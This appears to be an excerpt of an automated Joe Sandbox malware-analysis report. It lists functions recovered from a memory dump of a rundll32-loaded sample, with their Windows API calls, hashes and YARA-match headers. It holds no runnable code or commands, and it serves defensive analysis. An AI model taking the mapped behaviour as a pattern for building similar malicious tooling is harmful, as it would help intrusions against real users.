                              • SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000), ref: 05936FA0
                              • WaitForMultipleObjects.KERNEL32(00000002,05942EB3,00000000,000000FF), ref: 05936FB3
                              • CloseHandle.KERNEL32(05942EB3), ref: 05936FBC
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: TimerWaitable$CloseCreateHandleMultipleObjectsWaitwsprintf
                              • String ID: 0x%08X
                              • API String ID: 603522830-3182613153
                              • Opcode ID: fa7dfc2ac3c1dab037587a518e8923732743919ec4ed57d12f84af8eef5877fd
                              • Instruction ID: c74a6b574f7e102584977d2bfd37584d5c2dc612dd61e73a568aa6a3ca61fdbe
                              • Opcode Fuzzy Hash: fa7dfc2ac3c1dab037587a518e8923732743919ec4ed57d12f84af8eef5877fd
                              • Instruction Fuzzy Hash: 88011A71909229BBDB109BA4DC4ADEFBF7CEF45360F014118F916E2196EB70A611CBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0594D30A Relevance: 9.2, APIs: 6, Instructions: 202synchronizationCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 05939394: RtlAllocateHeap.NTDLL(00000000,?,05940051), ref: 059393A0
                              • GetLastError.KERNEL32(?,?,?,00001000,?,0595A2F4,76CDF750), ref: 0594D38B
                              • WaitForSingleObject.KERNEL32(00000000,00000000,?,0595A2F4,76CDF750), ref: 0594D410
                              • CloseHandle.KERNEL32(00000000,?,0595A2F4,76CDF750), ref: 0594D42A
                              • OpenProcess.KERNEL32(00100000,00000000,00000000,?,0595A2F4,76CDF750), ref: 0594D45F
                                • Part of subcall function 0593D6B0: RtlReAllocateHeap.NTDLL(00000000,?,?,05935546), ref: 0593D6C0
                              • WaitForSingleObject.KERNEL32(?,00000064,?,0595A2F4,76CDF750), ref: 0594D4E1
                              • CloseHandle.KERNEL32(F0FFC983,?,0595A2F4,76CDF750), ref: 0594D508
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocateCloseHandleHeapObjectSingleWait$ErrorLastOpenProcess
                              • String ID:
                              • API String ID: 3115907006-0
                              • Opcode ID: 49a6b4bb76ef9732685ca584c837fde8a59a1cfe001ecbf53d04e3e8eab2308e
                              • Instruction ID: 1ab61bbacb1119095617c2f2a50ad1b266e4add6b3d53114fd249353a2eda10e
                              • Opcode Fuzzy Hash: 49a6b4bb76ef9732685ca584c837fde8a59a1cfe001ecbf53d04e3e8eab2308e
                              • Instruction Fuzzy Hash: D2811575A04319EFCB11DFA4C884AADBBB5FF08354F158459E805AB250D730AD50CFA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0594B278 Relevance: 9.2, APIs: 6, Instructions: 200timestringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 05939394: RtlAllocateHeap.NTDLL(00000000,?,05940051), ref: 059393A0
                              • FileTimeToLocalFileTime.KERNEL32(00000000,05942702), ref: 0594B2DA
                              • FileTimeToSystemTime.KERNEL32(05942702,?), ref: 0594B2E8
                              • lstrlenW.KERNEL32(00000010), ref: 0594B2F8
                              • lstrlenW.KERNEL32(00000218), ref: 0594B304
                              • FileTimeToLocalFileTime.KERNEL32(00000008,05942702), ref: 0594B3F1
                              • FileTimeToSystemTime.KERNEL32(05942702,?), ref: 0594B3FF
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Time$File$LocalSystemlstrlen$AllocateHeap
                              • String ID:
                              • API String ID: 1122361434-0
                              • Opcode ID: 22ba76c213355619bb1c0d0e1c442919e00cd8bd6cc334c5b9c8435fe7d9ebd6
                              • Instruction ID: 92e4ef08a86d0bd11bcdf7881f3b14b0aef6652c6f6806d1a4ce0810043bcda8
                              • Opcode Fuzzy Hash: 22ba76c213355619bb1c0d0e1c442919e00cd8bd6cc334c5b9c8435fe7d9ebd6
                              • Instruction Fuzzy Hash: 7F710871A0020AABCF50DBA9C885EEEB7FDFB48304F144566E505E7240EB38EA55DB60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0593E40F Relevance: 9.1, APIs: 6, Instructions: 124memoryCOMMON
                              Download Yara Rule
                              APIs
                              • RtlImageNtHeader.NTDLL(?), ref: 0593E428
                                • Part of subcall function 05947A3E: lstrlenW.KERNEL32(00000000,00000000,00000000,?,?,?,?,0593E448,?), ref: 05947A6A
                                • Part of subcall function 05947A3E: RtlAllocateHeap.NTDLL(00000000,?), ref: 05947A7C
                                • Part of subcall function 05947A3E: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0593E448,?), ref: 05947A99
                                • Part of subcall function 05947A3E: lstrlenW.KERNEL32(00000000,?,?,0593E448,?), ref: 05947AA5
                                • Part of subcall function 05947A3E: HeapFree.KERNEL32(00000000,00000000,?,?,0593E448,?), ref: 05947AB9
                              • RtlEnterCriticalSection.NTDLL(00000000), ref: 0593E460
                              • CloseHandle.KERNEL32(?), ref: 0593E46E
                              • HeapFree.KERNEL32(00000000,?,?,00000001,?,?,00001000,?,?,00001000), ref: 0593E547
                              • RtlLeaveCriticalSection.NTDLL(00000000), ref: 0593E556
                              • HeapFree.KERNEL32(00000000,00000000,?,?,00001000,?,?,00001000), ref: 0593E569
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$Free$CriticalSectionlstrlen$AllocateCloseCreateDirectoryEnterHandleHeaderImageLeave
                              • String ID:
                              • API String ID: 1719504581-0
                              • Opcode ID: 999495891c69b9b70f9163a2116e321dc08e9abf3cadddc35d1c9ef10535982e
                              • Instruction ID: 1ac0dd938cedf077d93f455e42c685fed397955f23901776383adfce08f4bb8e
                              • Opcode Fuzzy Hash: 999495891c69b9b70f9163a2116e321dc08e9abf3cadddc35d1c9ef10535982e
                              • Instruction Fuzzy Hash: 1B417131614705EBDF219FA4D88AEAABF7EFF44701F014125F905A7211EB30EA65CB94
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0594D1DC Relevance: 9.1, APIs: 6, Instructions: 122threadCOMMON
                              Download Yara Rule
                              APIs
                              • GetModuleHandleA.KERNEL32(00000000,?), ref: 0594D237
                              • GetLastError.KERNEL32 ref: 0594D25D
                              • SetEvent.KERNEL32(00000000), ref: 0594D270
                              • GetModuleHandleA.KERNEL32(00000000), ref: 0594D2B9
                              • memset.NTDLL ref: 0594D2CE
                              • RtlExitUserThread.NTDLL(?), ref: 0594D303
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: HandleModule$ErrorEventExitLastThreadUsermemset
                              • String ID:
                              • API String ID: 3978817377-0
                              • Opcode ID: cf523dc5f4b9b264727951ff915e8f891facfce4aea3626adbf92261ed45873b
                              • Instruction ID: a45fb786a110cb0771a020abf15494c0108887d653291183a0659466779e2f41
                              • Opcode Fuzzy Hash: cf523dc5f4b9b264727951ff915e8f891facfce4aea3626adbf92261ed45873b
                              • Instruction Fuzzy Hash: 074106B5904704EFDB21DFA8D888CAABBBDFF856117644A19F94AD2100DB30AE44CF60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 05944F40 Relevance: 9.1, APIs: 6, Instructions: 117COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: f2762cf14b54d7b57259db950a3f58b317f4754f8b704ee57ad04452244c025c
                              • Instruction ID: 8a5c27dbc27621014d210f5f0402fc4c391d35665efd8e73b6c50c433c957fff
                              • Opcode Fuzzy Hash: f2762cf14b54d7b57259db950a3f58b317f4754f8b704ee57ad04452244c025c
                              • Instruction Fuzzy Hash: 3941E3B1504714DFD720AFB48889D2BBBE9FB84720B014A2DF66FC6180EB70A855CF90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0593EABA Relevance: 9.1, APIs: 6, Instructions: 108stringsynchronizationCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0593AE7C: lstrlen.KERNEL32(0593E448,00000000,00000000,?,?,05947A5B,?,?,?,?,0593E448,?), ref: 0593AE8B
                                • Part of subcall function 0593AE7C: mbstowcs.NTDLL ref: 0593AEA7
                              • lstrlenW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 0593EB0D
                                • Part of subcall function 0594BAD1: lstrlenW.KERNEL32(?,00000000,00000001,?,00000250,?,00000000), ref: 0594BB1D
                                • Part of subcall function 0594BAD1: lstrlenW.KERNEL32(?,?,00000000), ref: 0594BB29
                                • Part of subcall function 0594BAD1: memset.NTDLL ref: 0594BB71
                                • Part of subcall function 0594BAD1: FindFirstFileW.KERNEL32(00000000,00000000), ref: 0594BB8C
                                • Part of subcall function 0594BAD1: lstrlenW.KERNEL32(0000002C), ref: 0594BBC4
                                • Part of subcall function 0594BAD1: lstrlenW.KERNEL32(?), ref: 0594BBCC
                                • Part of subcall function 0594BAD1: memset.NTDLL ref: 0594BBEF
                                • Part of subcall function 0594BAD1: wcscpy.NTDLL ref: 0594BC01
                              • PathFindFileNameW.SHLWAPI(00000000,00000000,?,?,00000000,00000000,00000000), ref: 0593EB2E
                              • lstrlenW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 0593EB5A
                                • Part of subcall function 0594BAD1: PathFindFileNameW.SHLWAPI(0000001C,?,?,?,?,00000000), ref: 0594BC27
                                • Part of subcall function 0594BAD1: RtlEnterCriticalSection.NTDLL(?), ref: 0594BC5D
                                • Part of subcall function 0594BAD1: RtlLeaveCriticalSection.NTDLL(?), ref: 0594BC79
                                • Part of subcall function 0594BAD1: FindNextFileW.KERNEL32(?,00000000), ref: 0594BC92
                                • Part of subcall function 0594BAD1: WaitForSingleObject.KERNEL32(00000000), ref: 0594BCA4
                                • Part of subcall function 0594BAD1: FindClose.KERNEL32(?), ref: 0594BCB9
                                • Part of subcall function 0594BAD1: FindFirstFileW.KERNEL32(00000000,00000000), ref: 0594BCCD
                                • Part of subcall function 0594BAD1: lstrlenW.KERNEL32(0000002C), ref: 0594BCEF
                              • LocalFree.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 0593EB77
                              • WaitForSingleObject.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000), ref: 0593EB98
                              • PathFindFileNameW.SHLWAPI(0000001E,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 0593EBAD
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrlen$Find$File$NamePath$CriticalFirstObjectSectionSingleWaitmemset$CloseEnterFreeLeaveLocalNextmbstowcswcscpy
                              • String ID:
                              • API String ID: 2670873185-0
                              • Opcode ID: 3b4bb51cd49c601964e4c1f02c13bb86f9065aa25b82e64f73a98597303519be
                              • Instruction ID: 37dc3fb6eee4e73749e36f4b6a467871c35329235f04f45015645c6289ccc53c
                              • Opcode Fuzzy Hash: 3b4bb51cd49c601964e4c1f02c13bb86f9065aa25b82e64f73a98597303519be
                              • Instruction Fuzzy Hash: BC314C72508305EFCB11EF65D88AC6ABBFEFB88254F110929F58693210DB31DD19CB52
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0594EF9F Relevance: 9.1, APIs: 6, Instructions: 93memorystringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlen.KERNEL32(?,00000104,05953A4E,00000000,?,?,05949BAD,?,00000005,?,00000000), ref: 0594EFBB
                              • lstrlen.KERNEL32(00000000,00000104,05953A4E,00000000,?,?,05949BAD,?,00000005), ref: 0594EFD1
                              • lstrlen.KERNEL32(?,00000104,05953A4E,00000000,?,?,05949BAD,?,00000005), ref: 0594EFE6
                              • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 0594F04B
                              • _snprintf.NTDLL ref: 0594F071
                              • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000012,00000001,00000000), ref: 0594F090
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrlen$Heap$AllocateFree_snprintf
                              • String ID:
                              • API String ID: 3180502281-0
                              • Opcode ID: 0d501a6e319e6e6549e1172eb56b33a4b2cf1def96b44040ba16e75c9de0f2a1
                              • Instruction ID: f943fc84fd037f69524c4b412762ae8619825385022fb362f866959ee7281fa8
                              • Opcode Fuzzy Hash: 0d501a6e319e6e6549e1172eb56b33a4b2cf1def96b44040ba16e75c9de0f2a1
                              • Instruction Fuzzy Hash: D5315A32914219FFCB11DFA5DC84CAABFAAFB48351B118526FD09AB111D771AD209FA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0593A976 Relevance: 9.1, APIs: 6, Instructions: 91timememoryCOMMON
                              Download Yara Rule
                              APIs
                              • OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 0593A990
                              • CreateWaitableTimerA.KERNEL32(0595A1E8,00000001,?), ref: 0593A9AD
                              • GetLastError.KERNEL32(?,00000000,05948C06,00000000,00000000,0000801C,?,?,00000000,00000001,00000000,?,00000000,?,?,?), ref: 0593A9BE
                                • Part of subcall function 05951ECA: RegQueryValueExA.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,?,05932C89,?), ref: 05951F02
                                • Part of subcall function 05951ECA: RtlAllocateHeap.NTDLL(00000000,?), ref: 05951F16
                                • Part of subcall function 05951ECA: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,?,05932C89,?), ref: 05951F30
                                • Part of subcall function 05951ECA: RegCloseKey.KERNEL32(?,?,00000000,?,?,00000000,?,?,?,05932C89,?,?,?), ref: 05951F5A
                              • GetSystemTimeAsFileTime.KERNEL32(00000000,00000000,00000000,?,?,00000000,05948C06,00000000,00000000,0000801C), ref: 0593A9FE
                              • SetWaitableTimer.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,05948C06,00000000,00000000,0000801C), ref: 0593AA1D
                              • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,05948C06,00000000,00000000,0000801C), ref: 0593AA33
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: TimerWaitable$HeapQueryTimeValue$AllocateCloseCreateErrorFileFreeLastOpenSystem
                              • String ID:
                              • API String ID: 1835239314-0
                              • Opcode ID: 7a3f370abf5e9aad6be9d47276b4f00b9cf57c195041d6a6dee91695101689eb
                              • Instruction ID: 0cdcd1639921087bbc0d07eee31105b0706c3af31c1859a7bf59ab1f961b6fa5
                              • Opcode Fuzzy Hash: 7a3f370abf5e9aad6be9d47276b4f00b9cf57c195041d6a6dee91695101689eb
                              • Instruction Fuzzy Hash: BE312C72914208FFCB21DFA5CA8ACAEBFBAFB88351B108415F585E6111D7349A54CBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0593F519 Relevance: 9.1, APIs: 6, Instructions: 78memoryCOMMON
                              Download Yara Rule
                              APIs
                              • StrChrA.SHLWAPI(?,00000020,00000000,?,00000000,?,?,?,05947C35,00000000,?,?,?), ref: 0593F531
                              • StrChrA.SHLWAPI(00000001,00000020,?,?,?,05947C35,00000000,?,?,?), ref: 0593F542
                                • Part of subcall function 05931F0F: lstrlen.KERNEL32(?,?,00000000,00000000,?,05943D4E,00000000,?,?,00000000,00000001), ref: 05931F21
                                • Part of subcall function 05931F0F: StrChrA.SHLWAPI(?,0000000D,?,05943D4E,00000000,?,?,00000000,00000001), ref: 05931F59
                              • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 0593F582
                              • memcpy.NTDLL(00000000,?,00000007,?,?,?,05947C35,00000000), ref: 0593F5AF
                              • memcpy.NTDLL(00000000,?,?,00000000,?,00000007,?,?,?,05947C35,00000000), ref: 0593F5BE
                              • memcpy.NTDLL(?,?,?,00000000,?,?,00000000,?,00000007,?,?,?,05947C35,00000000), ref: 0593F5D0
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: memcpy$AllocateHeaplstrlen
                              • String ID:
                              • API String ID: 1819133394-0
                              • Opcode ID: 65a90d2f80c2762cb948b9f4f968011fea30c1be0db4517cb6c120cb8824da8b
                              • Instruction ID: 0f6243000d7b9afa58220960deca24285f0cec58c0196c59d98bec95be7e3dd9
                              • Opcode Fuzzy Hash: 65a90d2f80c2762cb948b9f4f968011fea30c1be0db4517cb6c120cb8824da8b
                              • Instruction Fuzzy Hash: 8B219072A04209FFDB119FA4CC86FAABBECEF08354F054151F909DB151EB74E9508BA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0595049A Relevance: 9.1, APIs: 6, Instructions: 74memoryCOMMON
                              Download Yara Rule
                              APIs
                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,00000001,00000000,00000000,00000000,00000000,?,?,?,?,00000000,00000000), ref: 059504D9
                              • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 059504EA
                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,00000001,00000000,?,00000000,00000000), ref: 05950505
                              • GetLastError.KERNEL32 ref: 0595051B
                              • HeapFree.KERNEL32(00000000,?), ref: 0595052D
                              • HeapFree.KERNEL32(00000000,?), ref: 05950542
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$ByteCharFreeMultiWide$AllocateErrorLast
                              • String ID:
                              • API String ID: 1822509305-0
                              • Opcode ID: d0cd7bf33c0c89d5219f8aebee2ed00ece80876dd13d1045586456506260342f
                              • Instruction ID: 0b16e1b50e333cab9c8bae5cc8de0f5b8dfae23d85952834d37245e04c22ec23
                              • Opcode Fuzzy Hash: d0cd7bf33c0c89d5219f8aebee2ed00ece80876dd13d1045586456506260342f
                              • Instruction Fuzzy Hash: 6C115E76511118FBCB219FA2DC09DEFBF7EEF453A1B000451F909A2010DB314A65EBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0594C8EF Relevance: 9.1, APIs: 6, Instructions: 67stringCOMMON
                              Download Yara Rule
                              APIs
                              • OpenProcess.KERNEL32(00000E39,00000000,?), ref: 0594C917
                              • _strupr.NTDLL ref: 0594C952
                              • lstrlen.KERNEL32(00000000), ref: 0594C95A
                              • TerminateProcess.KERNEL32(00000000,00000000), ref: 0594C999
                              • CloseHandle.KERNEL32(00000000,00000000,00000000,?,00000104), ref: 0594C9A0
                              • GetLastError.KERNEL32 ref: 0594C9A8
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process$CloseErrorHandleLastOpenTerminate_struprlstrlen
                              • String ID:
                              • API String ID: 110452925-0
                              • Opcode ID: be6d584bce6eeba3e948dc5a7bec41968115b0c81df8b9c268c492a95a913e23
                              • Instruction ID: 4bf330686977de217560e6563ad751eaf4015830d21f57ecf64bc0f1cf463f7c
                              • Opcode Fuzzy Hash: be6d584bce6eeba3e948dc5a7bec41968115b0c81df8b9c268c492a95a913e23
                              • Instruction Fuzzy Hash: EE11C176604304FFDB11ABB0DC89DAEBBADBB88761B100411F90BD2140EF319CA08F60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0594B549 Relevance: 9.1, APIs: 6, Instructions: 66registrymemoryCOMMON
                              Download Yara Rule
                              APIs
                              • RegOpenKeyA.ADVAPI32(80000001,?,76CDF710), ref: 0594B567
                              • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0594B595
                              • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 0594B5A7
                              • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0594B5CC
                              • HeapFree.KERNEL32(00000000,00000000), ref: 0594B5E7
                              • RegCloseKey.ADVAPI32(?), ref: 0594B5F1
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: HeapQueryValue$AllocateCloseFreeOpen
                              • String ID:
                              • API String ID: 170146033-0
                              • Opcode ID: 8bcaf6caa862051114ae3309bc782493439e1f62a2c5dbe956bf5303f913a1ea
                              • Instruction ID: e8510ff5b4ef43bb32efc65ae58876f4f861bdba02afe2d942c71af2b15df8ea
                              • Opcode Fuzzy Hash: 8bcaf6caa862051114ae3309bc782493439e1f62a2c5dbe956bf5303f913a1ea
                              • Instruction Fuzzy Hash: AC11D376914208FFEB11DBA9DD85CEEBFBEEB48201B104166F901E2110EB319E65EF10
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0593A5E7 Relevance: 9.1, APIs: 6, Instructions: 65memorystringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlen.KERNEL32(00000000,76CDF730,-00000001,00000000,?,?,?,05938EF7,?,00000000,000000FF), ref: 0593A5F8
                              • lstrlen.KERNEL32(?,?,?,?,05938EF7,?,00000000,000000FF), ref: 0593A5FF
                              • RtlAllocateHeap.NTDLL(00000000,00000020), ref: 0593A611
                              • _snprintf.NTDLL ref: 0593A637
                                • Part of subcall function 0594C01F: memset.NTDLL ref: 0594C034
                                • Part of subcall function 0594C01F: lstrlenW.KERNEL32(00000000,00000000,00000000,773EDBB0,00000020,00000000), ref: 0594C06D
                                • Part of subcall function 0594C01F: wcstombs.NTDLL ref: 0594C077
                                • Part of subcall function 0594C01F: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,0C000000,00000000,00000000,00000044,?,00000000,773EDBB0,00000020,00000000), ref: 0594C0A8
                                • Part of subcall function 0594C01F: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,0593A645), ref: 0594C0D4
                                • Part of subcall function 0594C01F: TerminateProcess.KERNEL32(?,000003E5), ref: 0594C0EA
                                • Part of subcall function 0594C01F: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,0593A645), ref: 0594C0FE
                                • Part of subcall function 0594C01F: CloseHandle.KERNEL32(?), ref: 0594C131
                                • Part of subcall function 0594C01F: CloseHandle.KERNEL32(?), ref: 0594C136
                              • _snprintf.NTDLL ref: 0593A66B
                                • Part of subcall function 0594C01F: GetLastError.KERNEL32 ref: 0594C102
                                • Part of subcall function 0594C01F: GetExitCodeProcess.KERNEL32(?,00000001), ref: 0594C122
                              • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,?,?,00000000,000000FF), ref: 0593A688
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Processlstrlen$CloseHandleHeapMultipleObjectsWait_snprintf$AllocateCodeCreateErrorExitFreeLastTerminatememsetwcstombs
                              • String ID:
                              • API String ID: 1481739438-0
                              • Opcode ID: 32c44afb418b5a027eac36502b056ab6b9f193a7577b555f43103dd38ee0a5bc
                              • Instruction ID: 4a5b5775d5ff62cd7b3fea482929fbac48fc64f36a7e4a144d6a6b6320292b8d
                              • Opcode Fuzzy Hash: 32c44afb418b5a027eac36502b056ab6b9f193a7577b555f43103dd38ee0a5bc
                              • Instruction Fuzzy Hash: 40118E72614218FFCB119F64DC85D9E7F6DEB08364B054121FE0A97212DB31EE24DBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0594F791 Relevance: 9.1, APIs: 6, Instructions: 64memorystringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlen.KERNEL32(0593261E,00000000,00000000,00000008,00000000,?,0593261E,0593988B,00000000,?), ref: 0594F7A7
                              • RtlAllocateHeap.NTDLL(00000000,00000009,00000000), ref: 0594F7BA
                              • lstrcpy.KERNEL32(00000008,0593261E), ref: 0594F7DC
                              • GetLastError.KERNEL32(05934A0A,00000000,00000000,?,0593261E,0593988B,00000000,?), ref: 0594F805
                              • HeapFree.KERNEL32(00000000,00000000,?,0593261E,0593988B,00000000,?), ref: 0594F81D
                              • CloseHandle.KERNEL32(00000000,05934A0A,00000000,00000000,?,0593261E,0593988B,00000000,?), ref: 0594F826
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseErrorFreeHandleLastlstrcpylstrlen
                              • String ID:
                              • API String ID: 2860611006-0
                              • Opcode ID: 7562492eb95078fba7b7cca3c85543e55cce9fe5600cadf943945447eff7faf2
                              • Instruction ID: 8d54a56feb067dc9e4dee822f26d702b89af0046ff12ac3a5d9a3049a680ad5e
                              • Opcode Fuzzy Hash: 7562492eb95078fba7b7cca3c85543e55cce9fe5600cadf943945447eff7faf2
                              • Instruction Fuzzy Hash: 6F11797151434AEFCB109FB4D889CAABFA8FB05361705452AF91AC7210DB349D65CBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0594508C Relevance: 9.1, APIs: 6, Instructions: 61stringthreadtimeCOMMON
                              Download Yara Rule
                              APIs
                              • GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,76C85520,?,?,?,05935112,00000000,?,00000000,00000000,?), ref: 0594509E
                                • Part of subcall function 05939394: RtlAllocateHeap.NTDLL(00000000,?,05940051), ref: 059393A0
                              • GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,05935112,00000000,?,00000000,00000000,?), ref: 059450B7
                              • GetCurrentThreadId.KERNEL32 ref: 059450C4
                              • GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,05935112,00000000,?,00000000,00000000,?), ref: 059450D0
                              • GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,05935112,00000000,?,00000000,00000000,?), ref: 059450DE
                              • lstrcpy.KERNEL32(00000000), ref: 05945100
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Temp$FilePathTime$AllocateCurrentHeapNameSystemThreadlstrcpy
                              • String ID:
                              • API String ID: 1175089793-0
                              • Opcode ID: 3606b727bf34db5d94e45ae114ec38e3dbb84621d305437d9e3b0d0acd732bde
                              • Instruction ID: 67b9209546f2721e5d19d216930256b33e38700f7b930e34dd99a7e883801738
                              • Opcode Fuzzy Hash: 3606b727bf34db5d94e45ae114ec38e3dbb84621d305437d9e3b0d0acd732bde
                              • Instruction Fuzzy Hash: DA0165729282157BD7115BE59D89E7F7F6CEF89A507060455B905D3101EF74EC108BB0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 05934F2E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120memorystringCOMMON
                              Download Yara Rule
                              APIs
                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 05934FB8
                              • lstrlen.KERNEL32(?,?), ref: 05934FE9
                              • memcpy.NTDLL(00000008,?,00000001), ref: 05934FF8
